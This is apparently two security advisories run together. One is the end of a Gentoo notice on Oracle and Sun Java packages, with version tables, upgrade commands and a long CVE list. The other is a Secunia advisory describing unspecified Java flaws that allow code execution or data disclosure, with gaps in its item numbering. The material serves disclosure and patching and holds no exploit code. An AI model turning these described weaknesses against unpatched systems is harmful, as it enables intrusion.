Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable!
2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 *
3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable!
4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 *
5 app-emulation/emul-linux-x86-java
< 1.7.0.51 >= 1.7.0.51 *
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate
to another package if one is available or wait for the
existing packages to be marked stable by their
architecture maintainers. Please review the CVE identifiers referenced below for
details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51"
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51"
All users of the precompiled 32-bit Oracle JRE should upgrade to the
latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51"
All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one
of the newer Oracle packages like dev-java/oracle-jdk-bin or
dev-java/oracle-jre-bin or choose another alternative we provide; eg.
the IBM JDK/JRE or the open source IcedTea.
References
==========
[ 1 ] CVE-2011-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563
[ 2 ] CVE-2011-5035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035
[ 3 ] CVE-2012-0497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497
[ 4 ] CVE-2012-0498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498
[ 5 ] CVE-2012-0499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499
[ 6 ] CVE-2012-0500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500
[ 7 ] CVE-2012-0501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501
[ 8 ] CVE-2012-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502
[ 9 ] CVE-2012-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503
[ 10 ] CVE-2012-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504
[ 11 ] CVE-2012-0505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505
[ 12 ] CVE-2012-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506
[ 13 ] CVE-2012-0507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507
[ 14 ] CVE-2012-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547
[ 15 ] CVE-2012-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531
[ 16 ] CVE-2012-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532
[ 17 ] CVE-2012-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533
[ 18 ] CVE-2012-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541
[ 19 ] CVE-2012-1682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682
[ 20 ] CVE-2012-1711
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711
[ 21 ] CVE-2012-1713
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713
[ 22 ] CVE-2012-1716
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716
[ 23 ] CVE-2012-1717
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717
[ 24 ] CVE-2012-1718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718
[ 25 ] CVE-2012-1719
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719
[ 26 ] CVE-2012-1721
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721
[ 27 ] CVE-2012-1722
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722
[ 28 ] CVE-2012-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723
[ 29 ] CVE-2012-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724
[ 30 ] CVE-2012-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725
[ 31 ] CVE-2012-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726
[ 32 ] CVE-2012-3136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136
[ 33 ] CVE-2012-3143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143
[ 34 ] CVE-2012-3159
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159
[ 35 ] CVE-2012-3174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174
[ 36 ] CVE-2012-3213
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213
[ 37 ] CVE-2012-3216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216
[ 38 ] CVE-2012-3342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342
[ 39 ] CVE-2012-4416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416
[ 40 ] CVE-2012-4681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681
[ 41 ] CVE-2012-5067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067
[ 42 ] CVE-2012-5068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068
[ 43 ] CVE-2012-5069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069
[ 44 ] CVE-2012-5070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070
[ 45 ] CVE-2012-5071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071
[ 46 ] CVE-2012-5072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072
[ 47 ] CVE-2012-5073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073
[ 48 ] CVE-2012-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074
[ 49 ] CVE-2012-5075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075
[ 50 ] CVE-2012-5076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076
[ 51 ] CVE-2012-5077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077
[ 52 ] CVE-2012-5079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079
[ 53 ] CVE-2012-5081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081
[ 54 ] CVE-2012-5083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083
[ 55 ] CVE-2012-5084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084
[ 56 ] CVE-2012-5085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085
[ 57 ] CVE-2012-5086
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086
[ 58 ] CVE-2012-5087
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087
[ 59 ] CVE-2012-5088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088
[ 60 ] CVE-2012-5089
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089
[ 61 ] CVE-2013-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169
[ 62 ] CVE-2013-0351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351
[ 63 ] CVE-2013-0401
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401
[ 64 ] CVE-2013-0402
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402
[ 65 ] CVE-2013-0409
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409
[ 66 ] CVE-2013-0419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419
[ 67 ] CVE-2013-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422
[ 68 ] CVE-2013-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423
[ 69 ] CVE-2013-0430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430
[ 70 ] CVE-2013-0437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437
[ 71 ] CVE-2013-0438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438
[ 72 ] CVE-2013-0445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445
[ 73 ] CVE-2013-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446
[ 74 ] CVE-2013-0448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448
[ 75 ] CVE-2013-0449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449
[ 76 ] CVE-2013-0809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809
[ 77 ] CVE-2013-1473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473
[ 78 ] CVE-2013-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479
[ 79 ] CVE-2013-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481
[ 80 ] CVE-2013-1484
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484
[ 81 ] CVE-2013-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485
[ 82 ] CVE-2013-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486
[ 83 ] CVE-2013-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487
[ 84 ] CVE-2013-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488
[ 85 ] CVE-2013-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491
[ 86 ] CVE-2013-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493
[ 87 ] CVE-2013-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500
[ 88 ] CVE-2013-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518
[ 89 ] CVE-2013-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537
[ 90 ] CVE-2013-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540
[ 91 ] CVE-2013-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557
[ 92 ] CVE-2013-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558
[ 93 ] CVE-2013-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561
[ 94 ] CVE-2013-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563
[ 95 ] CVE-2013-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564
[ 96 ] CVE-2013-1569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569
[ 97 ] CVE-2013-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571
[ 98 ] CVE-2013-2383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383
[ 99 ] CVE-2013-2384
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384
[ 100 ] CVE-2013-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394
[ 101 ] CVE-2013-2400
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400
[ 102 ] CVE-2013-2407
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407
[ 103 ] CVE-2013-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412
[ 104 ] CVE-2013-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414
[ 105 ] CVE-2013-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415
[ 106 ] CVE-2013-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416
[ 107 ] CVE-2013-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417
[ 108 ] CVE-2013-2418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418
[ 109 ] CVE-2013-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419
[ 110 ] CVE-2013-2420
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420
[ 111 ] CVE-2013-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421
[ 112 ] CVE-2013-2422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422
[ 113 ] CVE-2013-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423
[ 114 ] CVE-2013-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424
[ 115 ] CVE-2013-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425
[ 116 ] CVE-2013-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426
[ 117 ] CVE-2013-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427
[ 118 ] CVE-2013-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428
[ 119 ] CVE-2013-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429
[ 120 ] CVE-2013-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430
[ 121 ] CVE-2013-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431
[ 122 ] CVE-2013-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432
[ 123 ] CVE-2013-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433
[ 124 ] CVE-2013-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434
[ 125 ] CVE-2013-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435
[ 126 ] CVE-2013-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436
[ 127 ] CVE-2013-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437
[ 128 ] CVE-2013-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438
[ 129 ] CVE-2013-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439
[ 130 ] CVE-2013-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440
[ 131 ] CVE-2013-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442
[ 132 ] CVE-2013-2443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443
[ 133 ] CVE-2013-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444
[ 134 ] CVE-2013-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445
[ 135 ] CVE-2013-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446
[ 136 ] CVE-2013-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447
[ 137 ] CVE-2013-2448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448
[ 138 ] CVE-2013-2449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449
[ 139 ] CVE-2013-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450
[ 140 ] CVE-2013-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451
[ 141 ] CVE-2013-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452
[ 142 ] CVE-2013-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453
[ 143 ] CVE-2013-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454
[ 144 ] CVE-2013-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455
[ 145 ] CVE-2013-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456
[ 146 ] CVE-2013-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457
[ 147 ] CVE-2013-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458
[ 148 ] CVE-2013-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459
[ 149 ] CVE-2013-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460
[ 150 ] CVE-2013-2461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461
[ 151 ] CVE-2013-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462
[ 152 ] CVE-2013-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463
[ 153 ] CVE-2013-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464
[ 154 ] CVE-2013-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465
[ 155 ] CVE-2013-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466
[ 156 ] CVE-2013-2467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467
[ 157 ] CVE-2013-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468
[ 158 ] CVE-2013-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469
[ 159 ] CVE-2013-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470
[ 160 ] CVE-2013-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471
[ 161 ] CVE-2013-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472
[ 162 ] CVE-2013-2473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473
[ 163 ] CVE-2013-3743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743
[ 164 ] CVE-2013-3744
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744
[ 165 ] CVE-2013-3829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829
[ 166 ] CVE-2013-5772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772
[ 167 ] CVE-2013-5774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774
[ 168 ] CVE-2013-5775
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775
[ 169 ] CVE-2013-5776
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776
[ 170 ] CVE-2013-5777
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777
[ 171 ] CVE-2013-5778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778
[ 172 ] CVE-2013-5780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780
[ 173 ] CVE-2013-5782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782
[ 174 ] CVE-2013-5783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783
[ 175 ] CVE-2013-5784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784
[ 176 ] CVE-2013-5787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787
[ 177 ] CVE-2013-5788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788
[ 178 ] CVE-2013-5789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789
[ 179 ] CVE-2013-5790
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790
[ 180 ] CVE-2013-5797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797
[ 181 ] CVE-2013-5800
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800
[ 182 ] CVE-2013-5801
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801
[ 183 ] CVE-2013-5802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802
[ 184 ] CVE-2013-5803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803
[ 185 ] CVE-2013-5804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804
[ 186 ] CVE-2013-5805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805
[ 187 ] CVE-2013-5806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806
[ 188 ] CVE-2013-5809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809
[ 189 ] CVE-2013-5810
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810
[ 190 ] CVE-2013-5812
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812
[ 191 ] CVE-2013-5814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814
[ 192 ] CVE-2013-5817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817
[ 193 ] CVE-2013-5818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818
[ 194 ] CVE-2013-5819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819
[ 195 ] CVE-2013-5820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820
[ 196 ] CVE-2013-5823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823
[ 197 ] CVE-2013-5824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824
[ 198 ] CVE-2013-5825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825
[ 199 ] CVE-2013-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829
[ 200 ] CVE-2013-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830
[ 201 ] CVE-2013-5831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831
[ 202 ] CVE-2013-5832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832
[ 203 ] CVE-2013-5838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838
[ 204 ] CVE-2013-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840
[ 205 ] CVE-2013-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842
[ 206 ] CVE-2013-5843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843
[ 207 ] CVE-2013-5844
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844
[ 208 ] CVE-2013-5846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846
[ 209 ] CVE-2013-5848
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848
[ 210 ] CVE-2013-5849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849
[ 211 ] CVE-2013-5850
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850
[ 212 ] CVE-2013-5851
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851
[ 213 ] CVE-2013-5852
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852
[ 214 ] CVE-2013-5854
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854
[ 215 ] CVE-2013-5870
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870
[ 216 ] CVE-2013-5878
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878
[ 217 ] CVE-2013-5887
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887
[ 218 ] CVE-2013-5888
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888
[ 219 ] CVE-2013-5889
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889
[ 220 ] CVE-2013-5893
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893
[ 221 ] CVE-2013-5895
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895
[ 222 ] CVE-2013-5896
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896
[ 223 ] CVE-2013-5898
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898
[ 224 ] CVE-2013-5899
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899
[ 225 ] CVE-2013-5902
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902
[ 226 ] CVE-2013-5904
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904
[ 227 ] CVE-2013-5905
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905
[ 228 ] CVE-2013-5906
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906
[ 229 ] CVE-2013-5907
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907
[ 230 ] CVE-2013-5910
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910
[ 231 ] CVE-2014-0368
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368
[ 232 ] CVE-2014-0373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373
[ 233 ] CVE-2014-0375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375
[ 234 ] CVE-2014-0376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376
[ 235 ] CVE-2014-0382
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382
[ 236 ] CVE-2014-0385
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385
[ 237 ] CVE-2014-0387
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387
[ 238 ] CVE-2014-0403
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403
[ 239 ] CVE-2014-0408
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408
[ 240 ] CVE-2014-0410
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410
[ 241 ] CVE-2014-0411
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411
[ 242 ] CVE-2014-0415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415
[ 243 ] CVE-2014-0416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416
[ 244 ] CVE-2014-0417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417
[ 245 ] CVE-2014-0418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418
[ 246 ] CVE-2014-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422
[ 247 ] CVE-2014-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423
[ 248 ] CVE-2014-0424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424
[ 249 ] CVE-2014-0428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201401-30.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Oracle Java Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA52064
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52064/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52064/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52064/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Oracle Java, which can
be exploited by malicious local users to gain escalated privileges and
by malicious people to disclose certain sensitive information,
manipulate certain data, cause a DoS (Denial of Service), and
compromise a vulnerable system.
1) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
2) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
5) An unspecified error in the AWT component of the client and server
deployment can be exploited to potentially execute arbitrary code.
23) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose and manipulate certain data
and cause a DoS.
24) An unspecified error in the Install component of the client
deployment can be exploited by a local user to gain escalated
privileges.
25) An unspecified error in the AWT component of the client
deployment can be exploited to disclose and manipulate certain data.
26) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
27) An unspecified error in the Deployment component of the client
deployment can be exploited to manipulate certain data.
28) An unspecified error in the JAX-WS component of the client
deployment can be exploited to disclose certain data.
29) An unspecified error in the JAXP component of the client
deployment can be exploited to disclose certain data.
30) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
31) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
32) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
33) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
34) An unspecified error in the Networking component of the client
deployment can be exploited to manipulate certain data.
35) An unspecified error in the RMI component of the client
deployment can be exploited to manipulate certain data.
